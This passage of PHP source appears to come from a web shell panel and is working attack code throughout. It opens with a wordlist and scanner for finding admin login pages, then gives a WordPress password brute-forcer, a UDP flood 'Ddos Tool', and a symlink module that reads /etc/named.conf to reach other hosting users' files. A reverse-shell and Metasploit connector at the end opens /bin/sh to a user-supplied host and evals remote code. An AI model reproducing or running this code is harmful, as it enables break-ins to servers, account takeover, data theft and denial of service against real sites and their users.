\nadministrator.asp\r\nlogin.asp\r\nmodelsearch/login.asp\r\nmoderator.asp\r\nmoderator/login.asp\r\nmoderator/admin.asp\r\naccount.asp\r\ncontrolpanel.asp\r\nadmincontrol.asp\r\nadminpanel.asp\r\nfileadmin/\r\nfileadmin.php\r\nfileadmin.asp\r\nfileadmin.html\r\nadministration/\r\nadministration.php\r\nadministration.html\r\nsysadmin.php\r\nsysadmin.html\r\nphpmyadmin/\r\nmyadmin/\r\nsysadmin.asp\r\nsysadmin/\r\nur-admin.asp\r\nur-admin.php\r\nur-admin.html\r\nur-admin/\r\nServer.php\r\nServer.html\r\nServer.asp\r\nServer/\r\nwp-admin/\r\nadministr8.php\r\nadministr8.html\r\nadministr8/\r\nadministr8.asp\r\nwebadmin/\r\nwebadmin.php\r\nwebadmin.asp\r\nwebadmin.html\r\nadministratie/\r\nadmins/\r\nadmins.php\r\nadmins.asp\r\nadmins.html\r\nadministrivia/\r\nDatabase_Administration/\r\nWebAdmin/\r\nuseradmin/\r\nsysadmins/\r\nadmin1/\r\nsystem-administration/\r\nadministrators/\r\npgadmin/\r\ndirectadmin/\r\nstaradmin/\r\nServerAdministrator/\r\nSysAdmin/\r\nadminister/\r\nLiveUser_Admin/\r\nsys-admin/\r\ntypo3/\r\npanel/\r\ncpanel/\r\ncPanel/\r\ncpanel_file/\r\nplatz_login/\r\nrcLogin/\r\nblogindex/\r\nformslogin/\r\nautologin/\r\nsupport_login/\r\nmeta_login/\r\nmanuallogin/\r\nsimpleLogin/\r\nloginflat/\r\nutility_login/\r\nshowlogin/\r\nmemlogin/\r\nmembers/\r\nlogin-redirect/\r\nsub-login/\r\nwp-login/\r\nlogin1/\r\ndir-login/\r\nlogin_db/\r\nxlogin/\r\nsmblogin/\r\ncustomer_login/\r\nUserLogin/\r\nlogin-us/\r\nacct_login/\r\nadmin_area/\r\nbigadmin/\r\nproject-admins/\r\nphppgadmin/\r\npureadmin/\r\nsql-admin/\r\nradmind/\r\nopenvpnadmin/\r\nwizmysqladmin/\r\nvadmind/\r\nezsqliteadmin/\r\nhpwebjetadmin/\r\nnewsadmin/\r\nadminpro/\r\nLotus_Domino_Admin/\r\nbbadmin/\r\nvmailadmin/\r\nIndy_admin/\r\nccp14admin/\r\nirc-macadmin/\r\nbanneradmin/\r\nsshadmin/\r\nphpldapadmin/\r\nmacadmin/\r\nadministratoraccounts/\r\nadmin4_account/\r\nadmin4_colon/\r\nradmind-1/\r\nSuper-Admin/\r\nAdminTools/\r\ncmsadmin/\r\nSysAdmin2/\r\nglobes_admin/\r\ncadmins/\r\nphpSQLiteAdmin/\r\nnavSiteAdmin/\r\nserver_admin_small/\r\nlogo_sysadmin/\r\nserver/\r\ndatabase_administration/\r\npower_user/\r\nsystem_administration/\r\nss_vms_admin_sm/\r\nadminarea/\r\nbb-admin/\r\nadminLogin/\r\npanel-administracion/\r\ninstadmin/\r\nmemberadmin/\r\nadministratorlogin/\r\nadmin/admin.php\r\nadmin_area/admin.php\r\nadmin_area/login.php\r\nsiteadmin/login.php\r\nsiteadmin/index.php\r\nsiteadmin/login.html\r\nadmin/admin.html\r\nadmin_area/index.php\r\nbb-admin/index.php\r\nbb-admin/login.php\r\nbb-admin/admin.php\r\nadmin_area/login.html\r\nadmin_area/index.html\r\nadmincp/index.asp\r\nadmincp/login.asp\r\nadmincp/index.html\r\nwebadmin/index.html\r\nwebadmin/admin.html\r\nwebadmin/login.html\r\nadmin/admin_login.html\r\nadmin_login.html\r\npanel-administracion/login.html\r\nnsw/admin/login.php\r\nwebadmin/login.php\r\nadmin/admin_login.php\r\nadmin_login.php\r\nadmin_area/admin.html\r\npages/admin/admin-login.php\r\nadmin/admin-login.php\r\nadmin-login.php\r\nbb-admin/index.html\r\nbb-admin/login.html\r\nbb-admin/admin.html\r\nadmin/home.html\r\npages/admin/admin-login.html\r\nadmin/admin-login.html\r\nadmin-login.html\r\nadmin/adminLogin.html\r\nadminLogin.html\r\nhome.html\r\nrcjakar/admin/login.php\r\nadminarea/index.html\r\nadminarea/admin.html\r\nwebadmin/index.php\r\nwebadmin/admin.php\r\nuser.html\r\nmodelsearch/login.html\r\nadminarea/login.html\r\npanel-administracion/index.html\r\npanel-administracion/admin.html\r\nmodelsearch/index.html\r\nmodelsearch/admin.html\r\nadmincontrol/login.html\r\nadm/index.html\r\nadm.html\r\nuser.php\r\npanel-administracion/login.php\r\nwp-login.php\r\nadminLogin.php\r\nadmin/adminLogin.php\r\nhome.php\r\nadminarea/index.php\r\nadminarea/admin.php\r\nadminarea/login.php\r\npanel-administracion/index.php\r\npanel-administracion/admin.php\r\nmodelsearch/index.php\r\nmodelsearch/admin.php\r\nadmincontrol/login.php\r\nadm/admloginuser.php\r\nadmloginuser.php\r\nadmin2/login.php\r\nadmin2/index.php\r\nadm/index.php\r\nadm.php\r\naffiliate.php\r\nadm_auth.php\r\nmemberadmin.php\r\nadministratorlogin.php\r\nadmin/admin.asp\r\nadmin_area/admin.asp\r\nadmin_area/login.asp\r\nadmin_area/index.asp\r\nbb-admin/index.asp\r\nbb-admin/login.asp\r\nbb-admin/admin.asp\r\npages/admin/admin-login.asp\r\nadmin/admin-login.asp\r\nadmin-login.asp\r\nuser.asp\r\nwebadmin/index.asp\r\nwebadmin/admin.asp\r\nwebadmin/login.asp\r\nadmin/admin_login.asp\r\nadmin_login.asp\r\npanel-administracion/login.asp\r\nadminLogin.asp\r\nadmin/adminLogin.asp\r\nhome.asp\r\nadminarea/index.asp\r\nadminarea/admin.asp\r\nadminarea/login.asp\r\npanel-administracion/index.asp\r\npanel-administracion/admin.asp\r\nmodelsearch/index.asp\r\nmodelsearch/admin.asp\r\nadmincontrol/login.asp\r\nadm/admloginuser.asp\r\nadmloginuser.asp\r\nadmin2/login.asp\r\nadmin2/index.asp\r\nadm/index.asp\r\nadm.asp\r\naffiliate.asp\r\nadm_auth.asp\r\nmemberadmin.asp\r\nadministratorlogin.asp\r\nsiteadmin/login.asp\r\nsiteadmin/index.asp\r\nADMIN/\r\npaneldecontrol/\r\nlogin/\r\ncms/\r\nadmon/\r\nADMON/\r\nadministrador/\r\nADMIN/login.php\r\npanelc/\r\nADMIN/login.html";\r\nfunction template() {\r\necho \'\r\n\r\n<script type="text/javascript">\r\n<!--\r\nfunction insertcode($text, $place, $replace)\r\n{\r\n    var $this = $text;\r\n    var logbox = document.getElementById($place);\r\n    if($replace == 0)\r\n        document.getElementById($place).innerHTML = logbox.innerHTML+$this;\r\n    else\r\n        document.getElementById($place).innerHTML = $this;\r\n//document.getElementById("helpbox").innerHTML = $this;\r\n}\r\n-->\r\n</script>\r\n<br>\r\n<br>\r\n<h1 class="technique-two">\r\n       \r\n\r\n\r\n</h1>\r\n\r\n<div class="wrapper">\r\n<div class="red">\r\n<div class="tube">\r\n<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>\r\n<form action="" method="post" name="xploit_form">\r\n\r\n<tr>\r\n<tr>\r\n\t<b><td>URL</td>\r\n\t<td><input class="inputz" type="text" name="xploit_url" value="\'.$_POST[\'xploit_url\'].\'" style="width: 350px;" />\r\n\t</td>\r\n</tr><tr>\r\n\t<td>404 string</td>\r\n\t<td><input class="inputz" type="text" name="xploit_404string" value="\'.$_POST[\'xploit_404string\'].\'" style="width: 350px;" />\r\n\t</td></b>\r\n</tr><br><td>\r\n<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />\r\n</span></td></tr>\r\n</form></td></tr>\r\n<br /></table>\r\n</div> <!-- /tube -->\r\n</div> <!-- /red -->\r\n<br />\r\n<div class="green">\r\n<div class="tube" id="rightcol">\r\nVerificat: <span id="verified">0</span> / <span id="total">0</span><br />\r\n<b>Found ones:<br /></b>\r\n</div> <!-- /tube -->\r\n</div></center><!-- /green -->\r\n<br clear="all" /><br />\r\n<div class="blue">\r\n<div class="tube" id="logbox">\r\n<br />\r\n<br />\r\nAdmin page Finder :<br /><br />\r\n</div> <!-- /tube -->\r\n</div> <!-- /blue -->\r\n</div> <!-- /wrapper -->\r\n<br clear="all"><br>\';\r\n}\r\nfunction show($msg, $br=1, $stop=0, $place=\'logbox\', $replace=0) {\r\n    if($br == 1) $msg .= "<br />";\r\n    echo "<script type=\\"text/javascript\\">insertcode(\'".$msg."\', \'".$place."\', \'".$replace."\');</script>";\r\n    if($stop == 1) exit;\r\n    @flush();@ob_flush();\r\n}\r\nfunction check($x, $front=0) {\r\n    global $_POST,$site,$false;\r\n    if($front == 0) $t = $site.$x;\r\n    else $t = \'http://\'.$x.\'.\'.$site.\'/\';\r\n    $headers = get_headers($t);\r\n    if (!eregi(\'200\', $headers[0])) return 0;\r\n    $data = @file_get_contents($t);\r\n    if($_POST[\'xploit_404string\'] == "") if($data == $false) return 0;\r\n    if($_POST[\'xploit_404string\'] != "") if(strpos($data, $_POST[\'xploit_404string\'])) return 0;\r\n    return 1;\r\n}\r\n   \r\n// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\ntemplate();\r\nif(!isset($_POST[\'xploit_url\'])) die;\r\nif($_POST[\'xploit_url\'] == \'\') die;\r\n$site = $_POST[\'xploit_url\'];\r\nif ($site[strlen($site)-1] != "/") $site .= "/";\r\nif($_POST[\'xploit_404string\'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");\r\n$list[\'end\'] = str_replace("\\r", "", $list[\'end\']);\r\n$list[\'front\'] = str_replace("\\r", "", $list[\'front\']);\r\n$pathes = explode("\\n", $list[\'end\']);\r\n$frontpathes = explode("\\n", $list[\'front\']);\r\nshow(count($pathes)+count($frontpathes), 1, 0, \'total\', 1);\r\n$verificate = 0;\r\nforeach($pathes as $path) {\r\n    show(\'Checking \'.$site.$path.\' : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($path) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="\'.$site.$path.\'">\'.$site.$path.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n}\r\npreg_match("/\\/\\/(.*?)\\//i", $site, $xx); $site = $xx[1];\r\nif(substr($site, 0, 3) == "www") $site = substr($site, 4);\r\nforeach($frontpathes as $frontpath) {\r\n    show(\'Checking http://\'.$frontpath.\'.\'.$site.\'/ : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($frontpath, 1) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="http://\'.$frontpath.\'.\'.$site.\'/">\'.$frontpath.\'.\'.$site.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n   \r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wpbrute\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wpbrute" method="post">\r\n<center>\r\n<br><Br><b><font size=\'2\' >+--=[ Wordpress Brute Force ]=--+</font><br>\r\n<center><p>Tanks To <a href="https://www.facebook.com/anton115" target="_blank">Cah_bagus</a></p></b></center>\r\n<form enctype="multipart/form-data" method="POST">\r\n  <table width=\'624\' border=\'0\' class=\'tabnet\' id=\'Box\'>\r\n  <tr><th colspan="5">Wordpress Brute Force</th></tr>\r\n    \r\n\r\n    <tr>\r\n      <td >&nbsp;</td>\r\n      <td ><p>Hosts:</p></td>\r\n      <td ><p> Users:</p></td>\r\n      <td ><p>Passwords:</p></td>\r\n    </tr>\r\n    <tr>\r\n      <td>&nbsp;</td>\r\n      <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST[\'hosts\'];} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'usernames\'];}else {echo "admin";} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'passwords\'];}else {echo "admin\\nadministrator\\n123123\\n123321\\n123456\\n1234567\\n12345678\\n123456789\\n123456123456\\nadmin2010\\nadmin2011\\npassword\\nP@ssW0rd\\n!@#$%^\\n!@#$%^&*(\\n(*&^%$#@!\\n111111\\n222222\\n333333\\n444444\\n555555\\n666666\\n777777\\n888888\\n999999";} ?></textarea></td>\r\n    </tr>\r\n<tr><td colspan="4"><input class=\'inputzbut\' type="submit" name="submit" value="Brute Now"  />\r\n<?php\r\nif($_POST)\r\n{\r\n\t$hosts = trim(filter($_POST[\'hosts\']));\r\n\t$passwords = trim(filter($_POST[\'passwords\']));\r\n\t$usernames = trim(filter($_POST[\'usernames\']));\r\n\r\n\tif($passwords && $usernames && $hosts)\r\n\t{\r\n\t\t$hosts_explode = explode("\\n", $hosts);\r\n\t\t$usernames_explode = explode("\\n", $usernames);\r\n    \t$passwords_explode = explode("\\n", $passwords);\r\n\r\n\t\tforeach($hosts_explode as $host)\r\n\t\t{\r\n\t\t\t$host = RemoveLastSlash($host);\r\n\t\t\t$hacked = 0;\r\n\t\t\t$host = str_replace(array("http://","https://","www."),"",trim($host));\r\n\t\t\t$host = "http://".$host;\r\n\t\t\t$wpAdmin = $host.\'/wp-admin/\';\r\n\r\n\t\t\tif(!url_exists($host."/wp-login.php"))\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Error In Login Page !</font></p>";ob_flush();flush();continue;}\r\n\r\n\t\t\tforeach($usernames_explode as $username)\r\n\t\t\t{\r\n\t\t\t\tforeach($passwords_explode as $password)\r\n\t\t\t\t{\r\n\t\t\t\t\t$ch   =     curl_init();\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_URL,$host.\'/wp-login.php\');\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POST,TRUE);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");\r\n\t\t\t\t\t$login    =\t   curl_exec($ch);\r\n\r\n\t\t\t\t\tif(eregi ("profile.php",$login) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$hacked = 1;\r\n\t\t\t\t\t\techo "<p>".$host." => UserName : [<font color=\'green\'>".$username."</font>] : Password : [<font color=\'green\'>".$password."</font>]</p>";\r\n\t\t\t\t\t\tob_flush();flush();break;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif($hacked == 1){break;}\r\n\t\t\t}\r\n\t\t\tif($hacked == 0)\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Failed !</font></p>";ob_flush();flush();}\r\n\t\t}\r\n\t}\r\n\telse {echo "<p><font color=\'red\'>All fields are Required ! </font></p>";}\r\n}\r\n?>\r\n</td></tr>\r\n</table></form></center>\r\n<?php\r\nfunction url_exists($strURL)\r\n{\r\n    $resURL = curl_init();\r\n    curl_setopt($resURL, CURLOPT_URL, $strURL);\r\n    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);\r\n    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, \'curlHeaderCallback\');\r\n    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);\r\n    curl_exec ($resURL);\r\n    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);\r\n    curl_close ($resURL);\r\n    if ($intReturnCode != 200){return false;}\r\n\telse{return true ;}\r\n}\r\nfunction filter($string)\r\n{\r\n\tif(get_magic_quotes_gpc() != 0){return stripslashes($string);\t}\r\n\telse{return $string;\t}\r\n}\r\nfunction RemoveLastSlash($host)\r\n{\r\n\tif(strrpos($host, \'/\', -1) == strlen($host)-1)\r\n\t{return substr($host,0,strrpos($host, \'/\', -1));}\r\n\telse{return $host;}\r\n}\r\necho "</p>";\r\n}\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dos\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">\r\n<center><br><br><br>\r\nYour IP: <font color="red"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don\'t DoS yourself nub)<br><br>\r\n<table class="tabnet" style="width:333px;padding:0 1px;">\r\n<th colspan="5">Ddos Tool</th>\r\n<tr><tr><td>IP Target</td><td>:</td>\r\n<td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value==\'\' ) this.value = \'0.0.0.0\';" onfocus = " if ( this.value == \'0.0.0.0\' ) this.value = \'\';"/>\r\n</td></tr>\r\n<tr><td>Time</td><td>:</td>\r\n<td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value==\'\' ) this.value = \'time (in seconds)\';" onfocus = " if ( this.value == \'time (in seconds)\' ) this.value = \'\';"/>\r\n</td></tr>\r\n\r\n<tr><td>Port</td><td>:</td>\r\n<td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value==\'\' ) this.value = \'port\';" onfocus = " if ( this.value == \'port\' ) this.value = \'\';"/>\r\n</td></tr></tr></table></b><br>\r\n<input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">\r\n<br><br>\r\n<center>\r\nAfter initiating the DoS attack, please wait while the browser loads.\r\n</center>\r\n\r\n</form>\r\n</center>\r\n<?php\r\n$submit = $_POST[\'fire\'];\r\nif (isset($submit)) {\r\n\r\n$packets = 0;\r\n$ip = $_POST[\'ip\'];\r\n$rand = $_POST[\'port\'];\r\nset_time_limit(0);\r\nignore_user_abort(FALSE);\r\n\r\n$exec_time = $_POST[\'time\'];\r\n\r\n$time = time();\r\nprint "Flooded: $ip on port $rand <br><br>";\r\n$max_time = $time+$exec_time;\r\n\r\n\r\n\r\nfor($i=0;$i<65535;$i++){\r\n        $out .= "X";\r\n}\r\nwhile(1){\r\n$packets++;\r\n        if(time() > $max_time){\r\n                break;\r\n        }\r\n        \r\n        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);\r\n        if($fp){\r\n                fwrite($fp, $out);\r\n                fclose($fp);\r\n        }\r\n}\r\necho "Packet complete at ".time(\'h:i:s\')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \\n";\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'symlink\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">\r\n\r\n<?php   \r\n\r\n@set_time_limit(0);\r\n\r\necho "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";\r\n\r\n@mkdir(\'sym\',0777);\r\n$htaccess  = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n  AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n$write =@fopen (\'sym/.htaccess\',\'w\');\r\nfwrite($write ,$htaccess);\r\n@symlink(\'/\',\'sym/root\');\r\n$filelocation = basename(__FILE__);\r\n$read_named_conf = @file(\'/etc/named.conf\');\r\nif(!$read_named_conf)\r\n{\r\necho "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; \r\n}\r\nelse\r\n{\r\necho "<br><br><div class=\'tmp\'><table border=\'1\' bordercolor=\'#00ff00\' width=\'500\' cellpadding=\'1\' cellspacing=\'0\'><td>Domains</td><td>Users</td><td>symlink </td>";\r\nforeach($read_named_conf as $subject){\r\nif(eregi(\'zone\',$subject)){\r\npreg_match_all(\'#zone "(.*)"#\',$subject,$string);\r\nflush();\r\nif(strlen(trim($string[1][0])) >2){\r\n$UID = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$string[1][0]));\r\n$name = $UID[\'name\'] ;\r\n@symlink(\'/\',\'sym/root\');\r\n$name   = $string[1][0];\r\n$iran   = \'\\.ir\';\r\n$israel = \'\\.il\';\r\n$indo   = \'\\.id\';\r\n$sg12   = \'\\.sg\';\r\n$edu    = \'\\.edu\';\r\n$gov    = \'\\.gov\';\r\n$gose   = \'\\.go\';\r\n$gober  = \'\\.gob\';\r\n$mil1   = \'\\.mil\';\r\n$mil2   = \'\\.mi\';\r\n$malay\t= \'\\.my\';\r\n$china\t= \'\\.cn\';\r\n$japan\t= \'\\.jp\';\r\n$austr\t= \'\\.au\';\r\n$porn\t= \'\\.xxx\';\r\n$as\t\t= \'\\.uk\';\r\n$calfn\t= \'\\.ca\';\r\n\r\nif (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])\r\nor eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])\r\nor eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])\r\nor eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))\r\n{\r\n$name = "<div style=\' color: #FF0000 ; text-shadow: 0px 0px 1px red; \'>".$string[1][0].\'</div>\';\r\n}\r\necho "\r\n<tr>\r\n\r\n<td>\r\n<div class=\'dom\'><a target=\'_blank\' href=http://www.".$string[1][0].\'/>\'.$name.\' </a> </div>\r\n</td>\r\n\r\n<td>\r\n\'.$UID[\'name\']."\r\n</td>\r\n\r\n<td>\r\n<a href=\'sym/root/home/".$UID[\'name\']."/public_html\' target=\'_blank\'>Symlink </a>\r\n</td>\r\n\r\n</tr></div> ";\r\nflush();\r\n}\r\n}\r\n}\r\n}\r\n\r\necho "</center></table>";   \r\n\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'domain\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=domain" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>\';\r\n\r\n$file = @implode(@file("/etc/named.conf"));\r\nif(!$file){ die("# can\'t ReaD -> [ /etc/named.conf ]"); }\r\npreg_match_all("#named/(.*?).db#",$file ,$r);\r\n$domains = array_unique($r[1]);\r\n//check();\r\n//if(isset($_GET[\'ShowAll\']))\r\n{\r\necho "<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>\r\n<tr><td>Domain</td><td>User</td></tr>";\r\nforeach($domains as $domain){\r\n$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));\r\n\r\n\t\techo "<tr><td>$domain</td><td>".$user[\'name\']."</td></tr>";\r\n\t\t}\r\n\techo "</table>";\r\n\t}\r\n\r\necho \'</div>\';\r\n}\r\n//////////////////////////////////////////////////////\r\n/////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tool\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=tool" method="post">\r\n<?php\r\n\r\nerror_reporting(0);\r\nfunction ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}\r\n$s_my_ip = gethostbyname($_SERVER[\'HTTP_HOST\']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class=\'mybox\' align=\'center\'><td><h2>Reverse shell ( php )</h2><form method=\'post\' actions=\'?y=<?php echo $pwd;?>&amp;x=\'tool\'><table class=\'tabnet\'><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'rstarget4\' value=\'".$rstarget4."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'sqlportb4\' value=\'".$rsportb4."\' /></td></tr></table><input type=\'submit\' name=\'xback_php\' class=\'inputzbut\' value=\'connect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\' /><input type=\'hidden\' name=\'d\' value=\'".$pwd."\' /></form></td><td><hr color=\'#4C83AF\'><td><td><form method=\'POST\'><table class=\'tabnet\'><h2>Metasploit Connection </h2><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'40\' name=\'yip\' value=\'".$my_ip."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'5\' name=\'yport\' value=\'443\' /></td></tr></table><input class=\'inputzbut\' type=\'submit\' value=\'Connect\' name=\'metaConnect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\'></form></td></div></center></table><br><br />";\r\necho $s_result;\r\nif($_POST[\'metaConnect\']){$ipaddr = $_POST[\'yip\'];$port = $_POST[\'yport\'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable(\'stream_socket_client\')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = \'stream\';}elseif (is_callable(\'fsockopen\')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = \'stream\';}elseif (is_callable(\'socket_create\')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = \'socket\';}else {die();}switch ($msgsock_type){case \'stream\': $len = fread($msgsock, 4); break;case \'socket\': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a[\'len\'];$buffer = \'\';while (strlen($buffer) < $len){switch ($msgsock_type) {case \'stream\': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case \'socket\': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}\r\nif(isset($_REQUEST[\'sqlportb4\'])) $rsportb4 = ss($_REQUEST[\'sqlportb4\']);\r\nif(isset($_REQUEST[\'rstarget4\'])) $rstarget4 = ss($_REQUEST[\'rstarget4\']);\r\nif ($_POST[\'xback_php\']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = \'/bin/sh\';$daemon = 0;$debug = 0;if(function_exists(\'pcntl_fork\')){$pid = pcntl_fork();\r\nif ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}\r\numask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);\r\n$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\r\n$process = proc_open($shell, $descriptorspec, $pipes);\r\nif(!is_resource($process)) exit(1);\r\nstream_set_blocking($pipes[0], 0);\r\nstream_set_blocking($pipes[1], 0);\r\nstream_set_blocking($pipes[2], 0);\r\nstream_set_blocking($sock, 0);\r\nwhile(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\nif(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}\r\nif(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}\r\nif(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}\r\n}\r\n////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whois\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">\r\n   <?php\r\n   @set_time_limit(0);\r\n   @error_reporting(0);\r\n   function sws_domain_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/whois/$site");\r\n   flush();\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_net_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/asinfo/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_site_ser($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/reverseip/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_sup_dom($site)\r\n   {\r\n   $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");\r\n   $ip = @findit($getip,\'<strong>Nameservers found:</strong>\',\'<script 